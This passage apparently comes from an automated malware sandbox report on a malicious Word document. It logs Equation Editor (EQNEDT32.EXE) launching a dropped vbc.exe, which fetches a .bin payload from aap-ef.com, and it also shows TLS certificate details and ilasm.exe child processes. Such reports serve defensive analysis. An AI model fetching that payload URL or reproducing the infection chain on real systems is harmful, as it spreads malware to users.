00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$#BBBL^B`BdBRichBPELcO @J(4( .text `.dataP@.rsrc4@@IMSVBVM60.DLL


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              1192.168.2.2249166213.239.204.6080C:\Users\Public\vbc.exe
                              TimestampkBytes transferredDirectionData
                              Dec 3, 2020 09:54:00.064743042 CET61OUTGET /img/Breitburn_New_HTRJPFgzJ99.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                              Host: aap-ef.com
                              Cache-Control: no-cache
                              Dec 3, 2020 09:54:00.087563992 CET62INHTTP/1.1 301 Moved Permanently
                              Date: Thu, 03 Dec 2020 08:54:00 GMT
                              Server: Apache
                              Location: https://aap-ef.com/img/Breitburn_New_HTRJPFgzJ99.bin
                              Content-Length: 260
                              Content-Type: text/html; charset=iso-8859-1
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 61 70 2d 65 66 2e 63 6f 6d 2f 69 6d 67 2f 42 72 65 69 74 62 75 72 6e 5f 4e 65 77 5f 48 54 52 4a 50 46 67 7a 4a 39 39 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://aap-ef.com/img/Breitburn_New_HTRJPFgzJ99.bin">here</a>.</p></body></html>


                              HTTPS Packets

                              TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                              Dec 3, 2020 09:54:00.258285999 CET213.239.204.60443192.168.2.2249167CN=aap-ef.com CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Nov 19 01:00:00 CET 2020 Mon May 18 02:00:00 CEST 2015 Thu Jan 01 01:00:00 CET 2004Thu Feb 18 00:59:59 CET 2021 Sun May 18 01:59:59 CEST 2025 Mon Jan 01 00:59:59 CET 2029771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                              CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=USCN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBMon May 18 02:00:00 CEST 2015Sun May 18 01:59:59 CEST 2025
                              CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029

                              Code Manipulations

                              Statistics

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Start time:09:53:42
                              Start date:03/12/2020
                              Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                              Wow64 process (32bit):false
                              Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                              Imagebase:0x13fbe0000
                              File size:1424032 bytes
                              MD5 hash:95C38D04597050285A18F66039EDB456
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Start time:09:53:43
                              Start date:03/12/2020
                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                              Wow64 process (32bit):true
                              Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                              Imagebase:0x400000
                              File size:543304 bytes
                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Start time:09:53:45
                              Start date:03/12/2020
                              Path:C:\Users\Public\vbc.exe
                              Wow64 process (32bit):true
                              Commandline:'C:\Users\Public\vbc.exe'
                              Imagebase:0x400000
                              File size:57344 bytes
                              MD5 hash:36A1FE92A6D16E8B6EF766C06B7D9300
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Visual Basic
                              Antivirus matches:
                              • Detection: 0%, ReversingLabs
                              Reputation:low

                              General

                              Start time:09:53:48
                              Start date:03/12/2020
                              Path:C:\Users\Public\vbc.exe
                              Wow64 process (32bit):true
                              Commandline:'C:\Users\Public\vbc.exe'
                              Imagebase:0x400000
                              File size:57344 bytes
                              MD5 hash:36A1FE92A6D16E8B6EF766C06B7D9300
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Visual Basic
                              Reputation:low

                              General

                              Start time:09:54:04
                              Start date:03/12/2020
                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                              Wow64 process (32bit):true
                              Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                              Imagebase:0x400000
                              File size:543304 bytes
                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Start time:09:55:07
                              Start date:03/12/2020
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
                              Imagebase:0xe50000
                              File size:296600 bytes
                              MD5 hash:6D15369BC06C25E50ECBF1D6A091B2F6
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low

                              General

                              Start time:09:55:15
                              Start date:03/12/2020
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
                              Imagebase:0xe50000
                              File size:296600 bytes
                              MD5 hash:6D15369BC06C25E50ECBF1D6A091B2F6
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low

                              Disassembly

                              Code Analysis

                              Reset < >